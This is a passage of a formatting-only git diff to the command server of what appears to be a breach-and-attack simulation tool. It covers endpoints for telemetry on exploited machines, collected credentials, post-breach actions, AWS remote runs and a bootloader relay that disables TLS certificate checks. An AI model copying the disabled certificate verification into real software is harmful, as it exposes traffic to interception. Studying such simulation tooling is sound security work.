mimetype="text/plain") return response @jwt_required @@ -62,13 +64,15 @@ class FileUpload(flask_restful.Resource): :param file_type: Type indicates which file was deleted, linux of windows :return: Empty response """ - filename_path = PBA_LINUX_FILENAME_PATH if file_type == 'PBAlinux' else PBA_WINDOWS_FILENAME_PATH + filename_path = ( + PBA_LINUX_FILENAME_PATH if file_type == "PBAlinux" else PBA_WINDOWS_FILENAME_PATH + ) filename = ConfigService.get_config_value(filename_path) file_path = ABS_UPLOAD_PATH.joinpath(filename) try: if os.path.exists(file_path): os.remove(file_path) - ConfigService.set_config_value(filename_path, '') + ConfigService.set_config_value(filename_path, "") except OSError as e: LOG.error("Can't remove previously uploaded post breach files: %s" % e) @@ -82,8 +86,10 @@ class FileUpload(flask_restful.Resource): :param is_linux: Boolean indicating if this file is for windows or for linux :return: filename string """ - filename = secure_filename(request_.files['filepond'].filename) + filename = secure_filename(request_.files["filepond"].filename) file_path = ABS_UPLOAD_PATH.joinpath(filename).absolute() - request_.files['filepond'].save(str(file_path)) - ConfigService.set_config_value((PBA_LINUX_FILENAME_PATH if is_linux else PBA_WINDOWS_FILENAME_PATH), filename) + request_.files["filepond"].save(str(file_path)) + ConfigService.set_config_value( + (PBA_LINUX_FILENAME_PATH if is_linux else PBA_WINDOWS_FILENAME_PATH), filename + ) return filename diff --git a/monkey/monkey_island/cc/resources/remote_run.py b/monkey/monkey_island/cc/resources/remote_run.py index 0e80f25c0..0e6e6df10 100644 --- a/monkey/monkey_island/cc/resources/remote_run.py +++ b/monkey/monkey_island/cc/resources/remote_run.py @@ -8,10 +8,14 @@ from common.cloud.aws.aws_service import AwsService from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService -CLIENT_ERROR_FORMAT = "ClientError, error message: '{}'. Probably, the IAM role that has been associated with the " \ - "instance doesn't permit SSM calls. " -NO_CREDS_ERROR_FORMAT = "NoCredentialsError, error message: '{}'. Probably, no IAM role has been associated with the " \ - "instance. " +CLIENT_ERROR_FORMAT = ( + "ClientError, error message: '{}'. Probably, the IAM role that has been associated with the " + "instance doesn't permit SSM calls. " +) +NO_CREDS_ERROR_FORMAT = ( + "NoCredentialsError, error message: '{}'. Probably, no IAM role has been associated with the " + "instance. " +) class RemoteRun(flask_restful.Resource): @@ -20,24 +24,24 @@ class RemoteRun(flask_restful.Resource): RemoteRunAwsService.init() def run_aws_monkeys(self, request_body): - instances = request_body.get('instances') - island_ip = request_body.get('island_ip') + instances = request_body.get("instances") + island_ip = request_body.get("island_ip") return RemoteRunAwsService.run_aws_monkeys(instances, island_ip) @jwt_required def get(self): - action = request.args.get('action') - if action == 'list_aws': + action = request.args.get("action") + if action == "list_aws": is_aws = RemoteRunAwsService.is_running_on_aws() - resp = {'is_aws': is_aws} + resp = {"is_aws": is_aws} if is_aws: try: - resp['instances'] = AwsService.get_instances() + resp["instances"] = AwsService.get_instances() except NoCredentialsError as e: - resp['error'] = NO_CREDS_ERROR_FORMAT.format(e) + resp["error"] = NO_CREDS_ERROR_FORMAT.format(e) return jsonify(resp) except ClientError as e: - resp['error'] = CLIENT_ERROR_FORMAT.format(e) + resp["error"] = CLIENT_ERROR_FORMAT.format(e) return jsonify(resp) return jsonify(resp) @@ -47,11 +51,11 @@ class RemoteRun(flask_restful.Resource): def post(self): body = json.loads(request.data) resp = {} - if body.get('type') == 'aws': + if body.get("type") == "aws": RemoteRunAwsService.update_aws_region_authless() result = self.run_aws_monkeys(body) - resp['result'] = result + resp["result"] = result return jsonify(resp) # default action - return make_response({'error': 'Invalid action'}, 500) + return make_response({"error": "Invalid action"}, 500) diff --git a/monkey/monkey_island/cc/resources/root.py b/monkey/monkey_island/cc/resources/root.py index 041d38b5e..b7fc53d60 100644 --- a/monkey/monkey_island/cc/resources/root.py +++ b/monkey/monkey_island/cc/resources/root.py @@ -10,7 +10,7 @@ from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.database import Database from monkey_island.cc.services.infection_lifecycle import InfectionLifecycle -__author__ = 'Barak' +__author__ = "Barak" logger = logging.getLogger(__name__) @@ -21,7 +21,7 @@ class Root(flask_restful.Resource): def get(self, action=None): if not action: - action = request.args.get('action') + action = request.args.get("action") if not action: return self.get_server_info() @@ -30,13 +30,14 @@ class Root(flask_restful.Resource): elif action == "killall": return jwt_required(InfectionLifecycle.kill_all)() elif action == "is-up": - return {'is-up': True} + return {"is-up": True} else: - return make_response(400, {'error': 'unknown action'}) + return make_response(400, {"error": "unknown action"}) @jwt_required def get_server_info(self): return jsonify( ip_addresses=local_ip_addresses(), mongo=str(mongo.db), - completed_steps=InfectionLifecycle.get_completed_steps()) + completed_steps=InfectionLifecycle.get_completed_steps(), + ) diff --git a/monkey/monkey_island/cc/resources/security_report.py b/monkey/monkey_island/cc/resources/security_report.py index db434d616..b2ce0704e 100644 --- a/monkey/monkey_island/cc/resources/security_report.py +++ b/monkey/monkey_island/cc/resources/security_report.py @@ -5,7 +5,6 @@ from monkey_island.cc.services.reporting.report import ReportService class SecurityReport(flask_restful.Resource): - @jwt_required def get(self): return ReportService.get_report() diff --git a/monkey/monkey_island/cc/resources/telemetry.py b/monkey/monkey_island/cc/resources/telemetry.py index 75feb20a4..9bf2f7dda 100644 --- a/monkey/monkey_island/cc/resources/telemetry.py +++ b/monkey/monkey_island/cc/resources/telemetry.py @@ -14,7 +14,7 @@ from monkey_island.cc.resources.test.utils.telem_store import TestTelemStore from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.telemetry.processing.processing import process_telemetry -__author__ = 'Barak' +__author__ = "Barak" logger = logging.getLogger(__name__) @@ -22,37 +22,42 @@ logger = logging.getLogger(__name__) class Telemetry(flask_restful.Resource): @jwt_required def get(self, **kw): - monkey_guid = request.args.get('monkey_guid') - telem_category = request.args.get('telem_category') - timestamp = request.args.get('timestamp') + monkey_guid = request.args.get("monkey_guid") + telem_category = request.args.get("telem_category") + timestamp = request.args.get("timestamp") if "null" == timestamp: # special case to avoid ugly JS code... timestamp = None - result = {'timestamp': datetime.now().isoformat()} + result = {"timestamp": datetime.now().isoformat()} find_filter = {} if monkey_guid: - find_filter["monkey_guid"] = {'$eq': monkey_guid} + find_filter["monkey_guid"] = {"$eq": monkey_guid} if telem_category: - find_filter["telem_category"] = {'$eq': telem_category} + find_filter["telem_category"] = {"$eq": telem_category} if timestamp: - find_filter['timestamp'] = {'$gt': dateutil.parser.parse(timestamp)} + find_filter["timestamp"] = {"$gt": dateutil.parser.parse(timestamp)} - result['objects'] = self.telemetry_to_displayed_telemetry(mongo.db.telemetry.find(find_filter)) + result["objects"] = self.telemetry_to_displayed_telemetry( + mongo.db.telemetry.find(find_filter) + ) return result # Used by monkey. can't secure. @TestTelemStore.store_test_telem def post(self): telemetry_json = json.loads(request.data) - telemetry_json['data'] = json.loads(telemetry_json['data']) - telemetry_json['timestamp'] = datetime.now() - telemetry_json['command_control_channel'] = {'src': request.remote_addr, 'dst': request.host} + telemetry_json["data"] = json.loads(telemetry_json["data"]) + telemetry_json["timestamp"] = datetime.now() + telemetry_json["command_control_channel"] = { + "src": request.remote_addr, + "dst": request.host, + } # Monkey communicated, so it's alive. Update the TTL. - Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']).renew_ttl() + Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]).renew_ttl() - monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']) + monkey = NodeService.get_monkey_by_guid(telemetry_json["monkey_guid"]) NodeService.update_monkey_modify_time(monkey["_id"]) process_telemetry(telemetry_json) @@ -75,10 +80,10 @@ class Telemetry(flask_restful.Resource): monkey_label = telem_monkey_guid x["monkey"] = monkey_label objects.append(x) - if x['telem_category'] == TelemCategoryEnum.SYSTEM_INFO and 'credentials' in x['data']: - for user in x['data']['credentials']: - if -1 != user.find(','): - new_user = user.replace(',', '.') - x['data']['credentials'][new_user] = x['data']['credentials'].pop(user) + if x["telem_category"] == TelemCategoryEnum.SYSTEM_INFO and "credentials" in x["data"]: + for user in x["data"]["credentials"]: + if -1 != user.find(","): + new_user = user.replace(",", ".") + x["data"]["credentials"][new_user] = x["data"]["credentials"].pop(user) return objects diff --git a/monkey/monkey_island/cc/resources/telemetry_feed.py b/monkey/monkey_island/cc/resources/telemetry_feed.py index 3da328b99..4a2972cdb 100644 --- a/monkey/monkey_island/cc/resources/telemetry_feed.py +++ b/monkey/monkey_island/cc/resources/telemetry_feed.py @@ -13,45 +13,50 @@ from monkey_island.cc.services.node import NodeService logger = logging.getLogger(__name__) -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class TelemetryFeed(flask_restful.Resource): @jwt_required def get(self, **kw): - timestamp = request.args.get('timestamp') + timestamp = request.args.get("timestamp") if "null" == timestamp or timestamp is None: # special case to avoid ugly JS code... telemetries = mongo.db.telemetry.find({}) else: - telemetries = mongo.db.telemetry.find({'timestamp': {'$gt': dateutil.parser.parse(timestamp)}}) - telemetries = telemetries.sort([('timestamp', flask_pymongo.ASCENDING)]) + telemetries = mongo.db.telemetry.find( + {"timestamp": {"$gt": dateutil.parser.parse(timestamp)}} + ) + telemetries = telemetries.sort([("timestamp", flask_pymongo.ASCENDING)]) try: - return \ - { - 'telemetries': [TelemetryFeed.get_displayed_telemetry(telem) for telem in telemetries - if TelemetryFeed.should_show_brief(telem)], - 'timestamp': datetime.now().isoformat() - } + return { + "telemetries": [ + TelemetryFeed.get_displayed_telemetry(telem) + for telem in telemetries + if TelemetryFeed.should_show_brief(telem) + ], + "timestamp": datetime.now().isoformat(), + } except KeyError as err: logger.error("Failed parsing telemetries. Error: {0}.".format(err)) - return {'telemetries': [], 'timestamp': datetime.now().isoformat()} + return {"telemetries": [], "timestamp": datetime.now().isoformat()} @staticmethod def get_displayed_telemetry(telem): - monkey = NodeService.get_monkey_by_guid(telem['monkey_guid']) - default_hostname = "GUID-" + telem['monkey_guid'] - return \ - { - 'id': telem['_id'], - 'timestamp': telem['timestamp'].strftime('%d/%m/%Y %H:%M:%S'), - 'hostname': monkey.get('hostname', default_hostname) if monkey else default_hostname, - 'brief': TelemetryFeed.get_telem_brief(telem) - } + monkey = NodeService.get_monkey_by_guid(telem["monkey_guid"]) + default_hostname = "GUID-" + telem["monkey_guid"] + return { + "id": telem["_id"], + "timestamp": telem["timestamp"].strftime("%d/%m/%Y %H:%M:%S"), + "hostname": monkey.get("hostname", default_hostname) if monkey else default_hostname, + "brief": TelemetryFeed.get_telem_brief(telem), + } @staticmethod def get_telem_brief(telem): - telem_brief_parser = TelemetryFeed.get_telem_brief_parser_by_category(telem['telem_category']) + telem_brief_parser = TelemetryFeed.get_telem_brief_parser_by_category( + telem["telem_category"] + ) return telem_brief_parser(telem) @staticmethod @@ -60,61 +65,62 @@ class TelemetryFeed(flask_restful.Resource): @staticmethod def get_tunnel_telem_brief(telem): - tunnel = telem['data']['proxy'] + tunnel = telem["data"]["proxy"] if tunnel is None: - return 'No tunnel is used.' + return "No tunnel is used." else: tunnel_host_ip = tunnel.split(":")[-2].replace("//", "") - tunnel_host = NodeService.get_monkey_by_ip(tunnel_host_ip)['hostname'] - return 'Tunnel set up to machine: %s.' % tunnel_host + tunnel_host = NodeService.get_monkey_by_ip(tunnel_host_ip)["hostname"] + return "Tunnel set up to machine: %s." % tunnel_host @staticmethod def get_state_telem_brief(telem): - if telem['data']['done']: - return '''Monkey finishing its execution.''' + if telem["data"]["done"]: + return """Monkey finishing its execution.""" else: - return 'Monkey started.' + return "Monkey started." @staticmethod def get_exploit_telem_brief(telem): - target = telem['data']['machine']['ip_addr'] - exploiter = telem['data']['exploiter'] - result = telem['data']['result'] + target = telem["data"]["machine"]["ip_addr"] + exploiter = telem["data"]["exploiter"] + result = telem["data"]["result"] if result: - return 'Monkey successfully exploited %s using the %s exploiter.' % (target, exploiter) + return "Monkey successfully exploited %s using the %s exploiter." % (target, exploiter) else: - return 'Monkey failed exploiting %s using the %s exploiter.' % (target, exploiter) + return "Monkey failed exploiting %s using the %s exploiter." % (target, exploiter) @staticmethod def get_scan_telem_brief(telem): - return 'Monkey discovered machine %s.' % telem['data']['machine']['ip_addr'] + return "Monkey discovered machine %s." % telem["data"]["machine"]["ip_addr"] @staticmethod def get_systeminfo_telem_brief(telem): - return 'Monkey collected system information.' + return "Monkey collected system information." @staticmethod def get_trace_telem_brief(telem): - return 'Trace: %s' % telem['data']['msg'] + return "Trace: %s" % telem["data"]["msg"] @staticmethod def get_post_breach_telem_brief(telem): - return '%s post breach action executed on %s (%s) machine.' % (telem['data'][0]['name'], - telem['data'][0]['hostname'], - telem['data'][0]['ip']) + return "%s post breach action executed on %s (%s) machine." % ( + telem["data"][0]["name"], + telem["data"][0]["hostname"], + telem["data"][0]["ip"], + ) @staticmethod def should_show_brief(telem): - return telem['telem_category'] in TELEM_PROCESS_DICT + return telem["telem_category"] in TELEM_PROCESS_DICT -TELEM_PROCESS_DICT = \ - { - TelemCategoryEnum.TUNNEL: TelemetryFeed.get_tunnel_telem_brief, - TelemCategoryEnum.STATE: TelemetryFeed.get_state_telem_brief, - TelemCategoryEnum.EXPLOIT: TelemetryFeed.get_exploit_telem_brief, - TelemCategoryEnum.SCAN: TelemetryFeed.get_scan_telem_brief, - TelemCategoryEnum.SYSTEM_INFO: TelemetryFeed.get_systeminfo_telem_brief, - TelemCategoryEnum.TRACE: TelemetryFeed.get_trace_telem_brief, - TelemCategoryEnum.POST_BREACH: TelemetryFeed.get_post_breach_telem_brief - } +TELEM_PROCESS_DICT = { + TelemCategoryEnum.TUNNEL: TelemetryFeed.get_tunnel_telem_brief, + TelemCategoryEnum.STATE: TelemetryFeed.get_state_telem_brief, + TelemCategoryEnum.EXPLOIT: TelemetryFeed.get_exploit_telem_brief, + TelemCategoryEnum.SCAN: TelemetryFeed.get_scan_telem_brief, + TelemCategoryEnum.SYSTEM_INFO: TelemetryFeed.get_systeminfo_telem_brief, + TelemCategoryEnum.TRACE: TelemetryFeed.get_trace_telem_brief, + TelemCategoryEnum.POST_BREACH: TelemetryFeed.get_post_breach_telem_brief, +} diff --git a/monkey/monkey_island/cc/resources/test/clear_caches.py b/monkey/monkey_island/cc/resources/test/clear_caches.py index 34401b318..04c6b31d8 100644 --- a/monkey/monkey_island/cc/resources/test/clear_caches.py +++ b/monkey/monkey_island/cc/resources/test/clear_caches.py @@ -17,6 +17,7 @@ class ClearCaches(flask_restful.Resource): so we use this to clear the caches. :note: DO NOT CALL THIS IN PRODUCTION CODE as this will slow down the user experience. """ + @jwt_required def get(self, **kw): try: diff --git a/monkey/monkey_island/cc/resources/test/log_test.py b/monkey/monkey_island/cc/resources/test/log_test.py index a9c4f8b62..c6ec50f71 100644 --- a/monkey/monkey_island/cc/resources/test/log_test.py +++ b/monkey/monkey_island/cc/resources/test/log_test.py @@ -9,9 +9,9 @@ from monkey_island.cc.resources.auth.auth import jwt_required class LogTest(flask_restful.Resource): @jwt_required def get(self): - find_query = json_util.loads(request.args.get('find_query')) + find_query = json_util.loads(request.args.get("find_query")) log = mongo.db.log.find_one(find_query) if not log: - return {'results': None} - log_file = database.gridfs.get(log['file_id']) - return {'results': log_file.read().decode()} + return {"results": None} + log_file = database.gridfs.get(log["file_id"]) + return {"results": log_file.read().decode()} diff --git a/monkey/monkey_island/cc/resources/test/monkey_test.py b/monkey/monkey_island/cc/resources/test/monkey_test.py index da8333479..1122141d2 100644 --- a/monkey/monkey_island/cc/resources/test/monkey_test.py +++ b/monkey/monkey_island/cc/resources/test/monkey_test.py @@ -9,5 +9,5 @@ from monkey_island.cc.resources.auth.auth import jwt_required class MonkeyTest(flask_restful.Resource): @jwt_required def get(self, **kw): - find_query = json_util.loads(request.args.get('find_query')) - return {'results': list(mongo.db.monkey.find(find_query))} + find_query = json_util.loads(request.args.get("find_query")) + return {"results": list(mongo.db.monkey.find(find_query))} diff --git a/monkey/monkey_island/cc/resources/test/telemetry_test.py b/monkey/monkey_island/cc/resources/test/telemetry_test.py index 29108070e..54be08d71 100644 --- a/monkey/monkey_island/cc/resources/test/telemetry_test.py +++ b/monkey/monkey_island/cc/resources/test/telemetry_test.py @@ -9,5 +9,5 @@ from monkey_island.cc.resources.auth.auth import jwt_required class TelemetryTest(flask_restful.Resource): @jwt_required def get(self, **kw): - find_query = json_util.loads(request.args.get('find_query')) - return {'results': list(mongo.db.telemetry.find(find_query))} + find_query = json_util.loads(request.args.get("find_query")) + return {"results": list(mongo.db.telemetry.find(find_query))} diff --git a/monkey/monkey_island/cc/resources/test/utils/telem_store.py b/monkey/monkey_island/cc/resources/test/utils/telem_store.py index 707140c9e..5920c8da3 100644 --- a/monkey/monkey_island/cc/resources/test/utils/telem_store.py +++ b/monkey/monkey_island/cc/resources/test/utils/telem_store.py @@ -30,8 +30,16 @@ class TestTelemStore: method = request.method content = request.data.decode() endpoint = request.path - name = str(request.url_rule).replace('/', '_').replace('<', '_').replace('>', '_').replace(':', '_') - TestTelem(name=name, method=method, endpoint=endpoint, content=content, time=time).save() + name = ( + str(request.url_rule) + .replace("/", "_") + .replace("<", "_") + .replace(">", "_") + .replace(":", "_") + ) + TestTelem( + name=name, method=method, endpoint=endpoint, content=content, time=time + ).save() return f(*args, **kwargs) return decorated_function @@ -46,7 +54,10 @@ class TestTelemStore: shutil.rmtree(TELEM_SAMPLE_DIR) mkdir(TELEM_SAMPLE_DIR) for test_telem in TestTelem.objects(): - with open(TestTelemStore.get_unique_file_path_for_test_telem(TELEM_SAMPLE_DIR, test_telem), 'w') as file: + with open( + TestTelemStore.get_unique_file_path_for_test_telem(TELEM_SAMPLE_DIR, test_telem), + "w", + ) as file: file.write(test_telem.to_json(indent=2)) TestTelemStore.TELEMS_EXPORTED = True logger.info("Telemetries exported!") @@ -59,13 +70,15 @@ class TestTelemStore: if path.exists(potential_filepath): continue return potential_filepath - raise Exception(f"Too many telemetries of the same category. Max amount {MAX_SAME_CATEGORY_TELEMS}") + raise Exception( + f"Too many telemetries of the same category. Max amount {MAX_SAME_CATEGORY_TELEMS}" + ) @staticmethod def _get_filename_by_test_telem(test_telem: TestTelem): endpoint_part = test_telem.name - return endpoint_part + '_' + test_telem.method + return endpoint_part + "_" + test_telem.method -if __name__ == '__main__': +if __name__ == "__main__": TestTelemStore.export_test_telems() diff --git a/monkey/monkey_island/cc/resources/version_update.py b/monkey/monkey_island/cc/resources/version_update.py index 4c2eca1e3..87aa96153 100644 --- a/monkey/monkey_island/cc/resources/version_update.py +++ b/monkey/monkey_island/cc/resources/version_update.py @@ -5,7 +5,7 @@ import flask_restful from common.version import get_version from monkey_island.cc.services.version_update import VersionUpdateService -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" logger = logging.getLogger(__name__) @@ -18,7 +18,7 @@ class VersionUpdate(flask_restful.Resource): # even when not authenticated def get(self): return { - 'current_version': get_version(), - 'newer_version': VersionUpdateService.get_newer_version(), - 'download_link': VersionUpdateService.get_download_link() + "current_version": get_version(), + "newer_version": VersionUpdateService.get_newer_version(), + "download_link": VersionUpdateService.get_download_link(), } diff --git a/monkey/monkey_island/cc/resources/zero_trust/finding_event.py b/monkey/monkey_island/cc/resources/zero_trust/finding_event.py index ddef04b77..ce99390da 100644 --- a/monkey/monkey_island/cc/resources/zero_trust/finding_event.py +++ b/monkey/monkey_island/cc/resources/zero_trust/finding_event.py @@ -3,11 +3,16 @@ import json import flask_restful from monkey_island.cc.resources.auth.auth import jwt_required -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import MonkeyZTFindingService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_service import ( + MonkeyZTFindingService, +) class ZeroTrustFindingEvent(flask_restful.Resource): - @jwt_required def get(self, finding_id: str): - return {'events_json': json.dumps(MonkeyZTFindingService.get_events_by_finding(finding_id), default=str)} + return { + "events_json": json.dumps( + MonkeyZTFindingService.get_events_by_finding(finding_id), default=str + ) + } diff --git a/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/aws_keys.py b/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/aws_keys.py index 53e757f11..174e02843 100644 --- a/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/aws_keys.py +++ b/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/aws_keys.py @@ -5,7 +5,6 @@ from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_auth_service imp class AWSKeys(flask_restful.Resource): - @jwt_required def get(self): return get_aws_keys() diff --git a/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py b/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py index dbed4dd51..5197b1972 100644 --- a/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py +++ b/monkey/monkey_island/cc/resources/zero_trust/scoutsuite_auth/scoutsuite_auth.py @@ -6,29 +6,32 @@ from flask import request from common.cloud.scoutsuite_consts import CloudProviders from common.utils.exceptions import InvalidAWSKeys from monkey_island.cc.resources.auth.auth import jwt_required -from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_auth_service import (is_cloud_authentication_setup, - set_aws_keys) +from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_auth_service import ( + is_cloud_authentication_setup, + set_aws_keys, +) class ScoutSuiteAuth(flask_restful.Resource): - @jwt_required def get(self, provider: CloudProviders): if provider == CloudProviders.AWS.value: is_setup, message = is_cloud_authentication_setup(provider) - return {'is_setup': is_setup, 'message': message} + return {"is_setup": is_setup, "message": message} else: - return {'is_setup': False, 'message': ''} + return {"is_setup": False, "message": ""} @jwt_required def post(self, provider: CloudProviders): key_info = json.loads(request.data) - error_msg = '' + error_msg = "" if provider == CloudProviders.AWS.value: try: - set_aws_keys(access_key_id=key_info['accessKeyId'], - secret_access_key=key_info['secretAccessKey'], - session_token=key_info['sessionToken']) + set_aws_keys( + access_key_id=key_info["accessKeyId"], + secret_access_key=key_info["secretAccessKey"], + session_token=key_info["sessionToken"], + ) except InvalidAWSKeys as e: error_msg = str(e) - return {'error_msg': error_msg} + return {"error_msg": error_msg} diff --git a/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py b/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py index 433bf4631..8b3ce9419 100644 --- a/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py +++ b/monkey/monkey_island/cc/resources/zero_trust/zero_trust_report.py @@ -6,8 +6,12 @@ from flask import Response, jsonify from monkey_island.cc.resources.auth.auth import jwt_required from monkey_island.cc.services.zero_trust.zero_trust_report.finding_service import FindingService from monkey_island.cc.services.zero_trust.zero_trust_report.pillar_service import PillarService -from monkey_island.cc.services.zero_trust.zero_trust_report.principle_service import PrincipleService -from monkey_island.cc.services.zero_trust.zero_trust_report.scoutsuite_raw_data_service import ScoutSuiteRawDataService +from monkey_island.cc.services.zero_trust.zero_trust_report.principle_service import ( + PrincipleService, +) +from monkey_island.cc.services.zero_trust.zero_trust_report.scoutsuite_raw_data_service import ( + ScoutSuiteRawDataService, +) REPORT_DATA_PILLARS = "pillars" REPORT_DATA_FINDINGS = "findings" @@ -16,7 +20,6 @@ REPORT_DATA_SCOUTSUITE = "scoutsuite" class ZeroTrustReport(flask_restful.Resource): - @jwt_required def get(self, report_data=None): if report_data == REPORT_DATA_PILLARS: @@ -27,7 +30,8 @@ class ZeroTrustReport(flask_restful.Resource): return jsonify(FindingService.get_all_findings_for_ui()) elif report_data == REPORT_DATA_SCOUTSUITE: # Raw ScoutSuite data is already solved as json, no need to jsonify - return Response(ScoutSuiteRawDataService.get_scoutsuite_data_json(), - mimetype='application/json') + return Response( + ScoutSuiteRawDataService.get_scoutsuite_data_json(), mimetype="application/json" + ) flask_restful.abort(http.client.NOT_FOUND) diff --git a/monkey/monkey_island/cc/server_utils/bootloader_server.py b/monkey/monkey_island/cc/server_utils/bootloader_server.py index fbbd32815..1532f1a8d 100644 --- a/monkey/monkey_island/cc/server_utils/bootloader_server.py +++ b/monkey/monkey_island/cc/server_utils/bootloader_server.py @@ -16,27 +16,26 @@ logger = logging.getLogger(__name__) class BootloaderHttpServer(ThreadingMixIn, HTTPServer): - def __init__(self, mongo_url): self.mongo_client = pymongo.MongoClient(mongo_url) - server_address = ('', 5001) + server_address = ("", 5001) super().__init__(server_address, BootloaderHTTPRequestHandler) class BootloaderHTTPRequestHandler(BaseHTTPRequestHandler): - def do_POST(self): - content_length = int(self.headers['Content-Length']) + content_length = int(self.headers["Content-Length"]) post_data = self.rfile.read(content_length).decode() - island_server_path = BootloaderHTTPRequestHandler.get_bootloader_resource_url(self.request.getsockname()[0]) + island_server_path = BootloaderHTTPRequestHandler.get_bootloader_resource_url( + self.request.getsockname()[0] + ) island_server_path = parse.urljoin(island_server_path, self.path[1:]) # The island server doesn't always have a correct SSL cert installed # (By default it comes with a self signed one), # that's why we're not verifying the cert in this request. - r = requests.post(url=island_server_path, - data=post_data, - verify=False, - timeout=SHORT_REQUEST_TIMEOUT) # noqa: DUO123 + r = requests.post( + url=island_server_path, data=post_data, verify=False, timeout=SHORT_REQUEST_TIMEOUT + ) # noqa: DUO123 try: if r.status_code != 200: diff --git a/monkey/monkey_island/cc/server_utils/consts.py b/monkey/monkey_island/cc/server_utils/consts.py index 5a0e69581..67c7209eb 100644 --- a/monkey/monkey_island/cc/server_utils/consts.py +++ b/monkey/monkey_island/cc/server_utils/consts.py @@ -5,9 +5,7 @@ __author__ = "itay.mizeretz" MONKEY_ISLAND_ABS_PATH = os.path.join(os.getcwd(), "monkey_island") DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS = 60 * 5 -DEFAULT_SERVER_CONFIG_PATH = os.path.join( - MONKEY_ISLAND_ABS_PATH, "cc", "server_config.json" -) +DEFAULT_SERVER_CONFIG_PATH = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "server_config.json") DEFAULT_DEVELOP_SERVER_CONFIG_PATH = os.path.join( MONKEY_ISLAND_ABS_PATH, "cc", "server_config.json.develop" diff --git a/monkey/monkey_island/cc/server_utils/custom_json_encoder.py b/monkey/monkey_island/cc/server_utils/custom_json_encoder.py index 3c53586d1..0cc2036de 100644 --- a/monkey/monkey_island/cc/server_utils/custom_json_encoder.py +++ b/monkey/monkey_island/cc/server_utils/custom_json_encoder.py @@ -3,7 +3,6 @@ from flask.json import JSONEncoder class CustomJSONEncoder(JSONEncoder): - def default(self, obj): try: if isinstance(obj, ObjectId): diff --git a/monkey/monkey_island/cc/server_utils/encryptor.py b/monkey/monkey_island/cc/server_utils/encryptor.py index 161032c52..60ab8ead9 100644 --- a/monkey/monkey_island/cc/server_utils/encryptor.py +++ b/monkey/monkey_island/cc/server_utils/encryptor.py @@ -38,20 +38,18 @@ class Encryptor: ) def _unpad(self, message: str): - return message[0:-ord(message[len(message) - 1])] + return message[0 : -ord(message[len(message) - 1])] def enc(self, message: str): cipher_iv = Random.new().read(AES.block_size) cipher = AES.new(self._cipher_key, AES.MODE_CBC, cipher_iv) - return base64.b64encode( - cipher_iv + cipher.encrypt(self._pad(message).encode()) - ).decode() + return base64.b64encode(cipher_iv + cipher.encrypt(self._pad(message).encode())).decode() def dec(self, enc_message): enc_message = base64.b64decode(enc_message) - cipher_iv = enc_message[0:AES.block_size] + cipher_iv = enc_message[0 : AES.block_size] cipher = AES.new(self._cipher_key, AES.MODE_CBC, cipher_iv) - return self._unpad(cipher.decrypt(enc_message[AES.block_size:]).decode()) + return self._unpad(cipher.decrypt(enc_message[AES.block_size :]).decode()) def initialize_encryptor(password_file_dir): diff --git a/monkey/monkey_island/cc/server_utils/island_logger.py b/monkey/monkey_island/cc/server_utils/island_logger.py index 1efbb7734..a32f6505f 100644 --- a/monkey/monkey_island/cc/server_utils/island_logger.py +++ b/monkey/monkey_island/cc/server_utils/island_logger.py @@ -40,6 +40,4 @@ def _expanduser_log_file_paths(config: Dict): for handler_settings in handlers.values(): if "filename" in handler_settings: - handler_settings["filename"] = os.path.expanduser( - handler_settings["filename"] - ) + handler_settings["filename"] = os.path.expanduser(handler_settings["filename"]) diff --git a/monkey/monkey_island/cc/services/__init__.py b/monkey/monkey_island/cc/services/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/monkey_island/cc/services/__init__.py +++ b/monkey/monkey_island/cc/services/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/monkey_island/cc/services/attack/__init__.py b/monkey/monkey_island/cc/services/attack/__init__.py index 98867ed4d..4dc53e2ca 100644 --- a/monkey/monkey_island/cc/services/attack/__init__.py +++ b/monkey/monkey_island/cc/services/attack/__init__.py @@ -1 +1 @@ -__author__ = 'VakarisZ' +__author__ = "VakarisZ" diff --git a/monkey/monkey_island/cc/services/attack/attack_config.py b/monkey/monkey_island/cc/services/attack/attack_config.py index 2b9128edc..faff5f71b 100644 --- a/monkey/monkey_island/cc/services/attack/attack_config.py +++ b/monkey/monkey_island/cc/services/attack/attack_config.py @@ -17,7 +17,7 @@ class AttackConfig(object): @staticmethod def get_config(): - config = mongo.db.attack.find_one({'name': 'newconfig'})['properties'] + config = mongo.db.attack.find_one({"name": "newconfig"})["properties"] return config @staticmethod @@ -29,7 +29,7 @@ class AttackConfig(object): """ attack_config = AttackConfig.get_config() for config_key, attack_type in list(attack_config.items()): - for type_key, technique in list(attack_type['properties'].items()): + for type_key, technique in list(attack_type["properties"].items()): if type_key == technique_id: return technique return None @@ -44,7 +44,7 @@ class AttackConfig(object): @staticmethod def update_config(config_json): - mongo.db.attack.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True) + mongo.db.attack.update({"name": "newconfig"}, {"$set": config_json}, 